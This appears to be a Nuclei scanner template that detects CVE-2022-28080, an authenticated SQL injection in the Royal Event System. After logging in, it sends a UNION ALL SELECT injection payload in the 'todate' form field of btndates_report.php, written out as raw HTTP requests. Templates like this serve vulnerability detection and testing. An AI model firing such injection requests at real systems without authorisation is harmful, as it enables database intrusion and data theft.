id: CVE-2022-28080 info: name: Royal Event - SQL Injection author: lucasljm2001,ekrause,ritikchaddha severity: high description: | Detects an SQL Injection vulnerability in Royal Event System reference: - https://www.exploit-db.com/exploits/50934 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 tags: cve,cve2022,sqli,authenticated,cms,royalevent requests: - raw: - | POST /royal_event/ HTTP/1.1 Host: {{Hostname}} Content-Length: 353 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD ------WebKitFormBoundaryCSxQll1eihcqgIgD Content-Disposition: form-data; name="username" {{username}} ------WebKitFormBoundaryCSxQll1eihcqgIgD Content-Disposition: form-data; name="password" {{password}} ------WebKitFormBoundaryCSxQll1eihcqgIgD Content-Disposition: form-data; name="login" ------WebKitFormBoundaryCSxQll1eihcqgIgD-- - | POST /royal_event/btndates_report.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="todate" 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="search" 3 ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="fromdate" 01/01/2011 ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- cookie-reuse: true matchers-condition: and matchers: - type: word words: - '{{md5("{{randstr}}")}}' - type: status status: - 200